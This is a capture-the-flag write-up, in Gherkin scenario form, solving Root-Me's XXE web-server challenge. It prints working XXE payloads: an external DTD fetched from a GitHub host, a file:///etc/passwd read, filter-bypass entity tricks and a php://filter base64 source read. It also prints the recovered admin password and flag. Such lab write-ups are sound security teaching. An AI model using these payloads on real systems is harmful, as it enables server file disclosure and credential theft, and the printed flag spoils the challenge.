## Version 2.0
## language: en

Feature: xmlexternalentity-webserver-rootme
  Code:
    xml external entity
  Site:
    root-me
  Category:
    web server
  User:
    danmur
  Goal:
    Retrieve the administrator password.

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Firefox         | 67.0.4    |
    | Windows OS      | 10        |

  Machine information:
    Given I am accessing the web page
    """
    http://challenge01.root-me.org/web-serveur/ch29/index.php
    """
    And a form of rss validity checker appeared
    And a suggestion of input is a url
    And that there is a form for user authentication

  Scenario: Fail:initial-test
    When I type a url to some example rss
    And send it with submit button
    Then I see that titles are returned
    And "XML document is valid" text on each title

  Scenario: Fail:test-xxe
    Given the initial-test
    Then I build a valid rss payload
    And add a intenal dtd
    """
    <!DOCTYPE hack [
    <!ENTITY % dtd SYSTEM "https://raw.githubusercontent.com/danmur97/
    xxe-chll/master/pl.dtd">
    %dtd;
    ]>
    """
    And an external dtd file
    """
    <!-- pl.dtd file -->
    <!ENTITY % file "one piece">
    <!ENTITY % start "<![CDATA[">
    <!ENTITY % end "]]>">
    <!ENTITY all "%start;%file;%end;">
    <!ENTITY xd " to be continued">
    """
    When I test the payload
    Then I get the formed title
    """
    lol one piece to be continued
    """

  Scenario: Fail:test-xxe-2
    Given test-xxe
    When I try
    """
    <!-- pl.dtd file -->
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % start "<![CDATA[">
    <!ENTITY % end "]]>">
    <!ENTITY all "%start;%file;%end;">
    """
    Then I get
    """
    Warning: simplexml_load_string(https://raw.githubusercontent.com/danmur97
    /xxe-chll/master/pl1.dtd). failed to open stream: Connection refused in
    /challenge/web-serveur/ch29/index.php on line 34
    """

  Scenario: Fail:avoid-filter-test
    Given test-xxe-2 results
    When I try payloads that possible bypass regex filters
    """
    <!-- pl.dtd file -->
    <!ENTITY % slol "SYSTEM">
    <!ENTITY % file "file:">
    <!ENTITY % file2 "///challenge/web-serveur/ch29/index.php">
    <!ENTITY % start "<![CDATA[">
    <!ENTITY % end "]]>">
    <!ENTITY all "%start;<!ENTITY &#x25; d %slol; '%file;%file2;'>%end;">
    <!ENTITY % hack "<!ENTITY &#x25; d %slol; '%file;%file2;'>">
    %hack;
    <!ENTITY jeje "%start;%d;%end;">
    <!ENTITY loaded "dtd loaded">
    """
    Then I get
    """
    XML document is not valid
    """
    And for "///challenge/web-serveur/ch29" I get
    """
    Warning: simplexml_load_string(/challenge/web-serveur/ch29): failed
    to open stream: Permission denied in /challenge/web-serveur/ch29
    /index.php on line 34
    """

  Scenario: Success:php-protocol
    Given avoid-filter-test
    When I try php base64 for getting file
    """
    <!ENTITY % slol "SYSTEM">
    <!ENTITY % crtFile "<!ENTITY &#x25; file '/challenge/web-serveur/
    ch29/index.php'>">
    <!-- challenge/web-serveur/ch29 -->
    %crtFile;
    <!ENTITY % start "<![CDATA[">
    <!ENTITY % end "]]>">
    <!ENTITY % trickyUri "php://filter/convert.base64-encode/resource=%file;">
    <!ENTITY all "%start;<!ENTITY &#x25; d %slol; '%trickyUri;'>%end;">
    <!ENTITY % hack "<!ENTITY &#x25; d %slol; '%trickyUri;'>">
    %hack;
    <!ENTITY jeje "%start;%d;%end;">
    <!ENTITY loaded "dtd loaded">
    """
    Then for "/challenge/web-serveur/ch29/passwd"
    And "/challenge/web-serveur/ch29/etc/passwd"
    And "/etc/passwd"
    And "/passwd" I get unuseful results
    But for "/challenge/web-serveur/ch29/index.php" I get a base64 response
    Then I decode it and found the password
    """
    $user=$_POST["username"];
    $pass=$_POST["password"];
    if($user === "admin" && $pass === "c934fed17f1cac3045ddfeca34f332bc"){
        print "Flag : c934fed17f1cac3045ddfeca34f332bc<br />";
    }
    """
